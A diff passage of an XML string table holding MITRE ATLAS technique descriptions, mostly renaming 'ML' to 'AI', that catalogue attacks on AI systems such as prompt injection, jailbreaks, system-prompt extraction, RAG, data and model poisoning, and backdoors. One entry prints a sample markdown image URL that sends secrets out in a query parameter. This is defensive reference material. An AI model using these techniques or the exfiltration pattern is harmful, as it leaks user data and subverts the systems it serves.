 Depending on the adversary's knowledge of and access to the target model, the adversary may use different classes of algorithms to develop the adversarial example such as [White-Box Optimization](/techniques/AML.T0043.000), [Black-Box Optimization](/techniques/AML.T0043.001), [Black-Box Transfer](/techniques/AML.T0043.002), or [Manual Modification](/techniques/AML.T0043.003).
 The adversary may [Verify Attack](/techniques/AML.T0042) their approach works if they have white-box or inference API access to the model.
 This allows the adversary to gain confidence their attack is effective "live" environment where their attack may be noticed.
 They can then use the attack at a later time to accomplish their goals.
-An adversary may optimize adversarial examples for [Evade ML Model](/techniques/AML.T0015), or to [Erode ML Model Integrity](/techniques/AML.T0031).
-</t>
+An adversary may optimize adversarial examples for [Evade AI Model](/techniques/AML.T0015), or to [Erode AI Model Integrity](/techniques/AML.T0031).</t>
   </si>
   <si>
     <t xml:space="preserve">Adversaries may obtain models to serve as proxies for the target model in use at the victim organization.
@@ -1081,15 +1214,14 @@
 </t>
   </si>
   <si>
-    <t xml:space="preserve">Data is a key vector of supply chain compromise for adversaries.
-Every machine learning project will require some form of data.
+    <t>Data is a key vector of supply chain compromise for adversaries.
+Every AI project will require some form of data.
 Many rely on large open source datasets that are publicly available.
 An adversary could rely on compromising these sources of data.
 The malicious data could be a result of [Poison Training Data](/techniques/AML.T0020) or include traditional malware.
 An adversary can also target private datasets in the labeling phase.
 The creation of private datasets will often require the hiring of outside labeling services.
-An adversary can poison a dataset by modifying the labels being generated by the labeling service.
-</t>
+An adversary can poison a dataset by modifying the labels being generated by the labeling service.</t>
   </si>
   <si>
     <t xml:space="preserve">Adversaries may leverage information repositories to mine valuable information.
@@ -1112,34 +1244,21 @@
 </t>
   </si>
   <si>
-    <t xml:space="preserve">Adversaries may target machine learning systems with a flood of requests for the purpose of degrading or shutting down the service.
-Since many machine learning systems require significant amounts of specialized compute, they are often expensive bottlenecks that can become overloaded.
-Adversaries can intentionally craft inputs that require heavy amounts of useless compute from the machine learning system.
-</t>
-  </si>
-  <si>
-    <t>Adversaries may develop their own capabilities to support operations. This process encompasses identifying requirements, building solutions, and deploying capabilities. Capabilities used to support attacks on ML systems are not necessarily ML-based themselves. Examples include setting up websites with adversarial information or creating Jupyter notebooks with obfuscated exfiltration code.</t>
+    <t>Adversaries may target AI-enabled systems with a flood of requests for the purpose of degrading or shutting down the service.
+Since many AI systems require significant amounts of specialized compute, they are often expensive bottlenecks that can become overloaded.
+Adversaries can intentionally craft inputs that require heavy amounts of useless compute from the AI system.</t>
+  </si>
+  <si>
+    <t>Adversaries may develop their own capabilities to support operations. This process encompasses identifying requirements, building solutions, and deploying capabilities. Capabilities used to support attacks on AI-enabled systems are not necessarily AI-based themselves. Examples include setting up websites with adversarial information or creating Jupyter notebooks with obfuscated exfiltration code.</t>
   </si>
   <si>
     <t xml:space="preserve">An adversary may inject prompts directly as a user of the LLM. This type of injection may be used by the adversary to gain a foothold in the system or to misuse the LLM itself, as for example to generate harmful content.
 </t>
   </si>
   <si>
-    <t>Adversaries may discover model outputs, such as class scores, whose presence is not required for the system to function and are not intended for use by the end user. Model outputs may be found in logs or may be included in API responses.
-Model outputs may enable the adversary to identify weaknesses in the model and develop attacks.</t>
-  </si>
-  <si>
-    <t>Adversaries may prompt large language models and identify hallucinated entities.
-They may request software packages, commands, URLs, organization names, or e-mail addresses, and identify hallucinations with no connected real-world source. Discovered hallucinations provide the adversary with potential targets to [Publish Hallucinated Entities](/techniques/AML.T0060). Different LLMs have been shown to produce the same hallucinations, so the hallucinations exploited by an adversary may affect users of other LLMs.</t>
-  </si>
-  <si>
-    <t>The adversary is trying to discover something about the large language model's (LLM) system information. This may be found in a configuration file containing the system instructions or extracted via interactions with the LLM. The desired information may include the full system prompt, special characters that have significance to the LLM or keywords indicating functionality available to the LLM. Information about how the LLM is instructed can be used by the adversary to understand the system's capabilities and to aid them in crafting malicious prompts.</t>
-  </si>
-  <si>
-    <t xml:space="preserve">Adversaries may search private sources to identify machine learning artifacts that exist on the system and gather information about them.
+    <t>Adversaries may search private sources to identify AI learning artifacts that exist on the system and gather information about them.
 These artifacts can include the software stack used to train and deploy models, training and testing data management systems, container registries, software repositories, and model zoos.
-This information can be used to identify targets for further collection, exfiltration, or disruption, and to tailor and improve attacks.
-</t>
+This information can be used to identify targets for further collection, exfiltration, or disruption, and to tailor and improve attacks.</t>
   </si>
   <si>
     <t xml:space="preserve">Adversaries may discover the general family of model.
@@ -1148,19 +1267,37 @@
 </t>
   </si>
   <si>
-    <t xml:space="preserve">Adversaries may discover the ontology of a machine learning model's output space, for example, the types of objects a model can detect.
+    <t>Adversaries may discover the ontology of an AI model's output space, for example, the types of objects a model can detect.
 The adversary may discovery the ontology by repeated queries to the model, forcing it to enumerate its output space.
 Or the ontology may be discovered in a configuration file or in documentation about the model.
 The model ontology helps the adversary understand how the model is being used by the victim.
-It is useful to the adversary in creating targeted attacks.
-</t>
+It is useful to the adversary in creating targeted attacks.</t>
+  </si>
+  <si>
+    <t>Adversaries may discover model outputs, such as class scores, whose presence is not required for the system to function and are not intended for use by the end user. Model outputs may be found in logs or may be included in API responses.
+Model outputs may enable the adversary to identify weaknesses in the model and develop attacks.</t>
+  </si>
+  <si>
+    <t>Adversaries may prompt large language models and identify hallucinated entities.
+They may request software packages, commands, URLs, organization names, or e-mail addresses, and identify hallucinations with no connected real-world source. Discovered hallucinations provide the adversary with potential targets to [Publish Hallucinated Entities](/techniques/AML.T0060). Different LLMs have been shown to produce the same hallucinations, so the hallucinations exploited by an adversary may affect users of other LLMs.</t>
+  </si>
+  <si>
+    <t>The adversary is trying to discover something about the large language model's (LLM) system information. This may be found in a configuration file containing the system instructions or extracted via interactions with the LLM. The desired information may include the full system prompt, special characters that have significance to the LLM or keywords indicating functionality available to the LLM. Information about how the LLM is instructed can be used by the adversary to understand the system's capabilities and to aid them in crafting malicious prompts.</t>
   </si>
   <si>
     <t>Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
 Adversaries may use acquired domains for a variety of purposes (see [ATT&amp;CK](https://attack.mitre.org/techniques/T1583/001/)). Large AI datasets are often distributed as a list of URLs to individual datapoints. Adversaries may acquire expired domains that are included in these datasets and replace individual datapoints with poisoned examples ([Publish Poisoned Datasets](/techniques/AML.T0019)).</t>
   </si>
   <si>
-    <t>Adversaries may poison or manipulate portions of a dataset to reduce its usefulness, reduce trust, and cause users to waste resources correcting errors.</t>
+    <t>Adversaries may gain access to an AI system through a user visiting a website over the normal course of browsing, or an AI agent retrieving information from the web on behalf of a user. Websites can contain an [LLM Prompt Injection](/techniques/AML.T0051) which, when executed, can change the behavior of the AI model.
+The same approach may be used to deliver other types of malicious code that don't target AI directly (see [Drive-by Compromise in ATT&amp;CK](https://attack.mitre.org/techniques/T1189/)).</t>
+  </si>
+  <si>
+    <t>Adversaries may embed malicious code into AI Model files.
+AI models may be packaged as a combination of instructions and weights.
+Some formats such as pickle files are unsafe to deserialize because they can contain unsafe calls such as exec.
+Models with embedded malware may still operate as expected.
+It may allow them to achieve Execution, Command &amp; Control, or Exfiltrate Data.</t>
   </si>
   <si>
     <t xml:space="preserve">Adversaries may degrade the target model's performance with adversarial data inputs to erode confidence in the system over time.
@@ -1168,27 +1305,27 @@
 </t>
   </si>
   <si>
-    <t xml:space="preserve">Adversaries may create accounts with various services for use in targeting, to gain access to resources needed in [ML Attack Staging](/tactics/AML.TA0001), or for victim impersonation.
+    <t>Adversaries may poison or manipulate portions of a dataset to reduce its usefulness, reduce trust, and cause users to waste resources correcting errors.</t>
+  </si>
+  <si>
+    <t xml:space="preserve">Adversaries may create accounts with various services for use in targeting, to gain access to resources needed in [AI Attack Staging](/tactics/AML.TA0001), or for victim impersonation.
 </t>
   </si>
   <si>
-    <t xml:space="preserve">Adversaries can [Craft Adversarial Data](/techniques/AML.T0043) that prevent a machine learning model from correctly identifying the contents of the data.
-This technique can be used to evade a downstream task where machine learning is utilized.
-The adversary may evade machine learning based virus/malware detection, or network scanning towards the goal of a traditional cyber attack.
-</t>
-  </si>
-  <si>
-    <t xml:space="preserve">Adversaries may exfiltrate ML artifacts or other information relevant to their goals via traditional cyber means.
-See the ATT&amp;CK [Exfiltration](https://attack.mitre.org/tactics/TA0010/) tactic for more information.
-</t>
-  </si>
-  <si>
-    <t xml:space="preserve">Adversaries may exfiltrate private information via [AI Model Inference API Access](/techniques/AML.T0040).
-ML Models have been shown leak private information about their training data (e.g.  [Infer Training Data Membership](/techniques/AML.T0024.000), [Invert ML Model](/techniques/AML.T0024.001)).
-The model itself may also be extracted ([Extract ML Model](/techniques/AML.T0024.002)) for the purposes of [ML Intellectual Property Theft](/techniques/AML.T0048.004).
+    <t>Adversaries can [Craft Adversarial Data](/techniques/AML.T0043) that prevent a AI model from correctly identifying the contents of the data.
+This technique can be used to evade a downstream task where AI is utilized.
+The adversary may evade AI based virus/malware detection, or network scanning towards the goal of a traditional cyber attack.</t>
+  </si>
+  <si>
+    <t>Adversaries may exfiltrate private information via [AI Model Inference API Access](/techniques/AML.T0040).
+AI Models have been shown leak private information about their training data (e.g.  [Infer Training Data Membership](/techniques/AML.T0024.000), [Invert AI Model](/techniques/AML.T0024.001)).
+The model itself may also be extracted ([Extract AI Model](/techniques/AML.T0024.002)) for the purposes of [AI Intellectual Property Theft](/techniques/AML.T0048.004).
 Exfiltration of information relating to private training data raises privacy concerns.
-Private training data may include personally identifiable information, or other protected data.
-</t>
+Private training data may include personally identifiable information, or other protected data.</t>
+  </si>
+  <si>
+    <t>Adversaries may exfiltrate AI artifacts or other information relevant to their goals via traditional cyber means.
+See the ATT&amp;CK [Exfiltration](https://attack.mitre.org/tactics/TA0010/) tactic for more information.</t>
   </si>
   <si>
     <t xml:space="preserve">Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other applications with Internet accessible open sockets, such as web servers and related services.
@@ -1200,16 +1337,15 @@
 </t>
   </si>
   <si>
+    <t>Adversaries may extract a functional copy of a private model.
+By repeatedly querying the victim's [AI Model Inference API Access](/techniques/AML.T0040), the adversary can collect the target model's inferences into a dataset.
+The inferences are used as labels for training a separate model offline that will mimic the behavior and performance of the target model.
+Adversaries may extract the model to avoid paying per query in an artificial intelligence as a service (AIaaS) setting.
+Model extraction is used for [AI Intellectual Property Theft](/techniques/AML.T0048.004).</t>
+  </si>
+  <si>
     <t>Adversaries may attempt to extract a large language model's (LLM) system prompt. This can be done via prompt injection to induce the model to reveal its own system prompt or may be extracted from a configuration file.
 System prompts can be a portion of an AI provider's competitive advantage and are thus valuable intellectual property that may be targeted by adversaries.</t>
-  </si>
-  <si>
-    <t xml:space="preserve">Adversaries may extract a functional copy of a private model.
-By repeatedly querying the victim's [AI Model Inference API Access](/techniques/AML.T0040), the adversary can collect the target model's inferences into a dataset.
-The inferences are used as labels for training a separate model offline that will mimic the behavior and performance of the target model.
-Adversaries may extract the model to avoid paying per query in a machine learning as a service setting.
-Model extraction is used for [ML Intellectual Property Theft](/techniques/AML.T0048.004).
-</t>
   </si>
   <si>
     <t>Adversaries may introduce false entries into a victim's retrieval augmented generation (RAG) database. Content designed to be interpreted as a document by the large language model (LLM) used in the RAG system is included in a data source being ingested into the RAG database. When RAG entry including the false document is retrieved the, the LLM is tricked into treating part of the retrieved content as a false RAG result. 
@@ -1221,10 +1357,9 @@
 </t>
   </si>
   <si>
-    <t xml:space="preserve">Adversaries may gain full "white-box" access to a machine learning model.
+    <t>Adversaries may gain full "white-box" access to an AI model.
 This means the adversary has complete knowledge of the model architecture, its parameters, and class ontology.
-They may exfiltrate the model to [Craft Adversarial Data](/techniques/AML.T0043) and [Verify Attack](/techniques/AML.T0042) in an offline where it is hard to detect their behavior.
-</t>
+They may exfiltrate the model to [Craft Adversarial Data](/techniques/AML.T0043) and [Verify Attack](/techniques/AML.T0042) in an offline where it is hard to detect their behavior.</t>
   </si>
   <si>
     <t>Adversaries may identify data sources used in retrieval augmented generation (RAG) systems for targeting purposes. By pinpointing these sources, attackers can focus on poisoning or otherwise manipulating the external data repositories the AI relies on.
@@ -1236,6 +1371,10 @@
   </si>
   <si>
     <t>Adversaries may target AI systems by disrupting or manipulating the hardware supply chain. AI models often run on specialized hardware such as GPUs, TPUs, or embedded devices, but may also be optimized to operate on CPUs.</t>
+  </si>
+  <si>
+    <t>Adversaries may impersonate a trusted person or organization in order to persuade and trick a target into performing some action on their behalf. For example, adversaries may communicate with victims (via [Phishing](/techniques/AML.T0052), or [Spearphishing via Social Engineering LLM](/techniques/AML.T0052.000)) while impersonating a known sender such as an executive, colleague, or third-party vendor. Established trust can then be leveraged to accomplish an adversary's ultimate goals, possibly against multiple victims.
+Adversaries may target resources that are part of the AI DevOps lifecycle, such as model repositories, container registries, and software registries.</t>
   </si>
   <si>
     <t xml:space="preserve">An adversary may inject prompts indirectly via separate data channel ingested by the LLM such as include text or multimedia pulled from databases or websites.
@@ -1249,28 +1388,21 @@
 </t>
   </si>
   <si>
-    <t xml:space="preserve">Adversaries may introduce a backdoor into a model by injecting a payload into the model file.
-The payload detects the presence of the trigger and bypasses the model, instead producing the adversary's desired output.
-</t>
-  </si>
-  <si>
     <t xml:space="preserve">The adversary may add a perceptual trigger into inference data.
 The trigger may be imperceptible or non-obvious to humans.
-This technique is used in conjunction with [Poison ML Model](/techniques/AML.T0018.000) and allows the adversary to produce their desired effect in the target model.
+This technique is used in conjunction with [Poison AI Model](/techniques/AML.T0018.000) and allows the adversary to produce their desired effect in the target model.
 </t>
   </si>
   <si>
-    <t xml:space="preserve">Machine learning models' training data could be reconstructed by exploiting the confidence scores that are available via an inference API.
+    <t>AI models' training data could be reconstructed by exploiting the confidence scores that are available via an inference API.
 By querying the inference API strategically, adversaries can back out potentially private information embedded within the training data.
-This could lead to privacy violations if the attacker can reconstruct the data of sensitive features used in the algorithm.
-</t>
-  </si>
-  <si>
-    <t xml:space="preserve">Many of the publications accepted at premier machine learning conferences and journals come from commercial labs.
+This could lead to privacy violations if the attacker can reconstruct the data of sensitive features used in the algorithm.</t>
+  </si>
+  <si>
+    <t>Many of the publications accepted at premier artificial intelligence conferences and journals come from commercial labs.
 Some journals and conferences are open access, others may require paying for access or a membership.
 These publications will often describe in detail all aspects of a particular approach for reproducibility.
-This information can be used by adversaries to implement the paper.
-</t>
+This information can be used by adversaries to implement the paper.</t>
   </si>
   <si>
     <t xml:space="preserve">Adversaries may craft prompts that induce the LLM to leak sensitive information.
@@ -1314,49 +1446,27 @@
     <t>An adversary may use a carefully crafted [LLM Prompt Injection](/techniques/AML.T0051) designed to cause the LLM to replicate the prompt as part of its output. This allows the prompt to propagate to other LLMs and persist on the system. The self-replicating prompt is typically paired with other malicious instructions (ex: [LLM Jailbreak](/techniques/AML.T0054), [LLM Data Leakage](/techniques/AML.T0057)).</t>
   </si>
   <si>
+    <t>An adversary may get a large language model (LLM) to respond with private information that is hidden from the user when the response is rendered by the user's client. The private information is then exfiltrated. This can take the form of rendered images which automatically make a request to an adversary controlled server, or clickable links which require user interaction.
+For example, an LLM may produce the following markdown:
+```
+![ATLAS](https://atlas.mitre.org/image.png?secrets=private_data)
+```
+Which is rendered by the client as:
+```
+&lt;img src="https://atlas.mitre.org/image.png?secrets=private_data"&gt;
+```
+When the request is received by the adversary's server hosting the requested image, they receive the contents of the `secrets` query parameter.</t>
+  </si>
+  <si>
     <t>Adversaries may utilize prompts to a large language model (LLM) which manipulate various components of its response in order to make it appear trustworthy to the user. This helps the adversary continue to operate in the victim's environment and evade detection by the users it interacts with.
 The LLM may be instructed to tailor its language to appear more trustworthy to the user or attempt to manipulate the user to take certain actions. Other response components that could be manipulated include links, recommended follow-up actions, retrieved document metadata, and [Citations](/techniques/AML.T0067.000).</t>
   </si>
   <si>
-    <t xml:space="preserve">Adversaries may collect ML artifacts for [Exfiltration](/tactics/AML.TA0010) or for use in [ML Attack Staging](/tactics/AML.TA0001).
-ML artifacts include models and datasets as well as other telemetry data produced when interacting with a model.
-</t>
-  </si>
-  <si>
-    <t xml:space="preserve">Developing and staging machine learning attacks often requires expensive compute resources.
-Adversaries may need access to one or many GPUs in order to develop an attack.
-They may try to anonymously use free resources such as Google Colaboratory, or cloud resources such as AWS, Azure, or Google Cloud as an efficient way to stand up temporary resources to conduct operations.
-Multiple workspaces may be used to avoid detection.
-</t>
-  </si>
-  <si>
-    <t xml:space="preserve">Adversaries may exfiltrate ML artifacts to steal intellectual property and cause economic harm to the victim organization.
-Proprietary training data is costly to collect and annotate and may be a target for [Exfiltration](/tactics/AML.TA0010) and theft.
-MLaaS providers charge for use of their API.
-An adversary who has stolen a model via [Exfiltration](/tactics/AML.TA0010) or via [Extract ML Model](/techniques/AML.T0024.002) now has unlimited use of that service without paying the owner of the intellectual property.
-</t>
-  </si>
-  <si>
-    <t xml:space="preserve">Most machine learning systems rely on a limited set of machine learning frameworks.
-An adversary could get access to a large number of machine learning systems through a comprise of one of their supply chains.
-Many machine learning projects also rely on other open source implementations of various algorithms.
-These can also be compromised in a targeted way to get access to specific systems.
-</t>
-  </si>
-  <si>
-    <t xml:space="preserve">Adversaries may gain initial access to a system by compromising the unique portions of the ML supply chain.
-This could include [Hardware](/techniques/AML.T0010.000), [Data](/techniques/AML.T0010.002) and its annotations, parts of the ML [ML Software](/techniques/AML.T0010.001) stack, or the [Model](/techniques/AML.T0010.003) itself.
-In some instances the attacker will need secondary access to fully carry out an attack using compromised components of the supply chain.
-</t>
-  </si>
-  <si>
-    <t xml:space="preserve">Adversaries may use a product or service that uses machine learning under the hood to gain access to the underlying machine learning model.
-This type of indirect model access may reveal details of the ML model or its inferences in logs or metadata.
-</t>
-  </si>
-  <si>
     <t>Adversaries may develop malicious software packages that when imported by a user have a deleterious effect.
-Malicious packages may behave as expected to the user. They may be introduced via [ML Supply Chain Compromise](/techniques/AML.T0010). They may not present as obviously malicious to the user and may appear to be useful for an AI-related task.</t>
+Malicious packages may behave as expected to the user. They may be introduced via [AI Supply Chain Compromise](/techniques/AML.T0010). They may not present as obviously malicious to the user and may appear to be useful for an AI-related task.</t>
+  </si>
+  <si>
+    <t>Adversaries may directly manipulate an AI model to change its behavior or introduce malicious code. Manipulating a model gives the adversary a persistent change in the system. This can include poisoning the model by changing its weights, modifying the model architecture to change its behavior, and embedding malware which may be executed when the model is loaded.</t>
   </si>
   <si>
     <t xml:space="preserve">Adversaries may manually modify the input data to craft adversarial data.
@@ -1365,12 +1475,14 @@
 </t>
   </si>
   <si>
-    <t xml:space="preserve">Machine learning systems often rely on open sourced models in various ways.
+    <t>Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.</t>
+  </si>
+  <si>
+    <t>AI-enabled systems often rely on open sourced models in various ways.
 Most commonly, the victim organization may be using these models for fine tuning.
 These models will be downloaded from an external source and then used as the base for the model as it is tuned on a smaller, private dataset.
 Loading models often requires executing some saved code in the form of a saved model file.
-These can be compromised with traditional malware, or through some adversarial machine learning techniques.
-</t>
+These can be compromised with traditional malware, or through some adversarial AI techniques.</t>
   </si>
   <si>
     <t xml:space="preserve">Adversaries may acquire public models to use in their operations.
@@ -1381,8 +1493,12 @@
 </t>
   </si>
   <si>
+    <t>Adversaries may directly modify an AI model's architecture to re-define it's behavior. This can include adding or removing layers as well as adding pre or post-processing operations.
+The effects could include removing the ability to predict certain classes, adding erroneous operations to increase computation costs, or degrading performance. Additionally, a separate adversary-defined network could be injected into the computation graph, which can change the behavior based on the inputs, effectively creating a backdoor.</t>
+  </si>
+  <si>
     <t>Adversaries may search for and obtain software capabilities for use in their operations.
-Capabilities may be specific to ML-based attacks [Adversarial ML Attack Implementations](/techniques/AML.T0016.000) or generic software tools repurposed for malicious intent ([Software Tools](/techniques/AML.T0016.001)). In both instances, an adversary may modify or customize the capability to aid in targeting a particular ML system.</t>
+Capabilities may be specific to AI-based attacks [Adversarial AI Attack Implementations](/techniques/AML.T0016.000) or generic software tools repurposed for malicious intent ([Software Tools](/techniques/AML.T0016.001)). In both instances, an adversary may modify or customize the capability to aid in targeting a particular AI-enabled system.</t>
   </si>
   <si>
     <t xml:space="preserve">Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
@@ -1400,17 +1516,16 @@
 </t>
   </si>
   <si>
-    <t xml:space="preserve">Adversaries may introduce a backdoor by training the model poisoned data, or by interfering with its training process.
-The model learns to associate an adversary-defined trigger with the adversary's desired output.
-</t>
-  </si>
-  <si>
-    <t xml:space="preserve">Adversaries may attempt to poison datasets used by a ML model by modifying the underlying data or its labels.
-This allows the adversary to embed vulnerabilities in ML models trained on the data that may not be easily detectable.
+    <t>Adversaries may manipulate an AI model's weights to change it's behavior or performance, resulting in a poisoned model.
+Adversaries may poison a model by by directly manipulating its weights, training the model on poisoned data, further fine-tuning the model, or otherwise interfering with its training process. 
+The change in behavior of poisoned models may be limited to targeted categories in predictive AI models, or targeted topics, concepts, or facts in generative AI models, or aim for a general performance degradation.</t>
+  </si>
+  <si>
+    <t>Adversaries may attempt to poison datasets used by an AI model by modifying the underlying data or its labels.
+This allows the adversary to embed vulnerabilities in AI models trained on the data that may not be easily detectable.
 Data poisoning attacks may or may not require modifying the labels.
 The embedded vulnerability is activated at a later time by data samples with an [Insert Backdoor Trigger](/techniques/AML.T0043.004)
-Poisoned data can be introduced via [ML Supply Chain Compromise](/techniques/AML.T0010) or the data may be poisoned after the adversary gains [Initial Access](/tactics/AML.TA0004) to the system.
-</t>
+Poisoned data can be introduced via [AI Supply Chain Compromise](/techniques/AML.T0010) or the data may be poisoned after the adversary gains [Initial Access](/tactics/AML.TA0004) to the system.</t>
   </si>
   <si>
     <t xml:space="preserve">Pre-Print repositories, such as arXiv, contain the latest academic research papers that haven't been peer reviewed.
@@ -1425,11 +1540,11 @@
   <si>
     <t xml:space="preserve">Adversaries may [Poison Training Data](/techniques/AML.T0020) and publish it to a public location.
 The poisoned dataset may be a novel dataset or a poisoned variant of an existing open source dataset.
-This data may be introduced to a victim system via [ML Supply Chain Compromise](/techniques/AML.T0010).
+This data may be introduced to a victim system via [AI Supply Chain Compromise](/techniques/AML.T0010).
 </t>
   </si>
   <si>
-    <t>Adversaries may publish a poisoned model to a public location such as a model registry or code repository. The poisoned model may be a novel model or a poisoned variant of an existing open-source model. This model may be introduced to a victim system via [ML Supply Chain Compromise](/techniques/AML.T0010).</t>
+    <t>Adversaries may publish a poisoned model to a public location such as a model registry or code repository. The poisoned model may be a novel model or a poisoned variant of an existing open-source model. This model may be introduced to a victim system via [AI Supply Chain Compromise](/techniques/AML.T0010).</t>
   </si>
   <si>
     <t>Adversaries may inject malicious content into data indexed by a retrieval augmented generation (RAG) system to contaminate a future thread through RAG-based search results. This may be accomplished by placing manipulated documents in a location the RAG indexes (see [Gather RAG-Indexed Targets](/techniques/AML.T0064)).
@@ -1445,50 +1560,53 @@
 Large language models may be used as an assistant to aid an adversary in crafting content.</t>
   </si>
   <si>
-    <t xml:space="preserve">Adversaries may search open application repositories during targeting.
+    <t>Adversaries may utilize a reverse shell to communicate and control the victim system.
+Typically, a user uses a client to connect to a remote machine which is listening for connections. With a reverse shell, the adversary is listening for incoming connections initiated from the victim system.</t>
+  </si>
+  <si>
+    <t>Adversaries may search open application repositories during targeting.
 Examples of these include Google Play, the iOS App store, the macOS App Store, and the Microsoft Store.
-Adversaries may craft search queries seeking applications that contain a ML-enabled components.
-Frequently, the next step is to [Acquire Public ML Artifacts](/techniques/AML.T0002).
-</t>
-  </si>
-  <si>
-    <t xml:space="preserve">Adversaries may search websites owned by the victim for information that can be used during targeting.
-Victim-owned websites may contain technical details about their ML-enabled products or services.
+Adversaries may craft search queries seeking applications that contain a AI-enabled components.
+Frequently, the next step is to [Acquire Public AI Artifacts](/techniques/AML.T0002).</t>
+  </si>
+  <si>
+    <t>Much like the [Search Open Technical Databases](/techniques/AML.T0000), there is often ample research available on the vulnerabilities of common AI models. Once a target has been identified, an adversary will likely try to identify any pre-existing work that has been done for this class of models.
+This will include not only reading academic papers that may identify the particulars of a successful attack, but also identifying pre-existing implementations of those attacks. The adversary may obtain [Adversarial AI Attack Implementations](/techniques/AML.T0016.000) or develop their own [Adversarial AI Attacks](/techniques/AML.T0017.000) if necessary.</t>
+  </si>
+  <si>
+    <t>Adversaries may search for publicly available research and technical documentation to learn how and where AI is used within a victim organization.
+The adversary can use this information to identify targets for attack, or to tailor an existing attack to make it more effective.
+Organizations often use open source model architectures trained on additional proprietary data in production.
+Knowledge of this underlying architecture allows the adversary to craft more realistic proxy models ([Create Proxy AI Model](/techniques/AML.T0005)).
+An adversary can search these resources for publications for authors employed at the victim organization.
+Research and technical materials may exist as academic papers published in [Journals and Conference Proceedings](/techniques/AML.T0000.000), or stored in [Pre-Print Repositories](/techniques/AML.T0000.001), as well as [Technical Blogs](/techniques/AML.T0000.002).</t>
+  </si>
+  <si>
+    <t>Adversaries may search websites owned by the victim for information that can be used during targeting.
+Victim-owned websites may contain technical details about their AI-enabled products or services.
 Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info.
 These sites may also have details highlighting business operations and relationships.
 Adversaries may search victim-owned websites to gather actionable information.
-This information may help adversaries tailor their attacks (e.g. [Adversarial ML Attacks](/techniques/AML.T0017.000) or [Manual Modification](/techniques/AML.T0043.003)).
-Information from these sources may reveal opportunities for other forms of reconnaissance (e.g. [Search for Victim's Publicly Available Research Materials](/techniques/AML.T0000) or [Search for Publicly Available Adversarial Vulnerability Analysis](/techniques/AML.T0001))
-</t>
-  </si>
-  <si>
-    <t>Much like the [Search for Victim's Publicly Available Research Materials](/techniques/AML.T0000), there is often ample research available on the vulnerabilities of common models. Once a target has been identified, an adversary will likely try to identify any pre-existing work that has been done for this class of models.
-This will include not only reading academic papers that may identify the particulars of a successful attack, but also identifying pre-existing implementations of those attacks. The adversary may obtain [Adversarial ML Attack Implementations](/techniques/AML.T0016.000) or develop their own [Adversarial ML Attacks](/techniques/AML.T0017.000) if necessary.</t>
-  </si>
-  <si>
-    <t xml:space="preserve">Adversaries may search publicly available research to learn how and where machine learning is used within a victim organization.
-The adversary can use this information to identify targets for attack, or to tailor an existing attack to make it more effective.
-Organizations often use open source model architectures trained on additional proprietary data in production.
-Knowledge of this underlying architecture allows the adversary to craft more realistic proxy models ([Create Proxy ML Model](/techniques/AML.T0005)).
-An adversary can search these resources for publications for authors employed at the victim organization.
-Research materials may exist as academic papers published in [Journals and Conference Proceedings](/techniques/AML.T0000.000), or stored in [Pre-Print Repositories](/techniques/AML.T0000.001), as well as [Technical Blogs](/techniques/AML.T0000.002).
-</t>
+This information may help adversaries tailor their attacks (e.g. [Adversarial AI Attacks](/techniques/AML.T0017.000) or [Manual Modification](/techniques/AML.T0043.003)).
+Information from these sources may reveal opportunities for other forms of reconnaissance (e.g. [Search Open Technical Databases](/techniques/AML.T0000) or [Search Open AI Vulnerability Analysis](/techniques/AML.T0001))</t>
+  </si>
+  <si>
+    <t>Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
+Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to proxy traffic to an adversary-owned command and control server. As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers. This can be used to bypass a Content Security Policy that prevents retrieving content from arbitrary locations.</t>
   </si>
   <si>
     <t xml:space="preserve">Societal harms might generate harmful outcomes that reach either the general public or specific vulnerable groups such as the exposure of children to vulgar content.
 </t>
   </si>
   <si>
-    <t xml:space="preserve">Adversaries may search for and obtain software tools to support their operations.
+    <t>Adversaries may search for and obtain software tools to support their operations.
 Software designed for legitimate use may be repurposed by an adversary for malicious intent.
 An adversary may modify or customize software tools to achieve their purpose.
-Software tools used to support attacks on ML systems are not necessarily ML-based themselves.
-</t>
-  </si>
-  <si>
-    <t xml:space="preserve">Adversaries may spam the machine learning system with chaff data that causes increase in the number of detections.
-This can cause analysts at the victim organization to waste time reviewing and correcting incorrect inferences.
-</t>
+Software tools used to support attacks on AI systems are not necessarily AI-based themselves.</t>
+  </si>
+  <si>
+    <t>Adversaries may spam the AI system with chaff data that causes increase in the number of detections.
+This can cause analysts at the victim organization to waste time reviewing and correcting incorrect inferences.</t>
   </si>
   <si>
     <t xml:space="preserve">Adversaries may turn LLMs into targeted social engineers.
@@ -1502,40 +1620,41 @@
     <t>Adversaries may discover delimiters and special characters sets used by the large language model. For example, delimiters used in retrieval augmented generation applications to differentiate between context and user prompts. These can later be exploited to confuse or manipulate the large language model into misbehaving.</t>
   </si>
   <si>
+    <t>Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](/techniques/AML.T0017)) or obtained ([Obtain Capabilities](/techniques/AML.T0016)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](/techniques/AML.T0008)) or was otherwise compromised by them. Capabilities may also be staged on web services, such as GitHub, model registries, such as Hugging Face, or container registries.
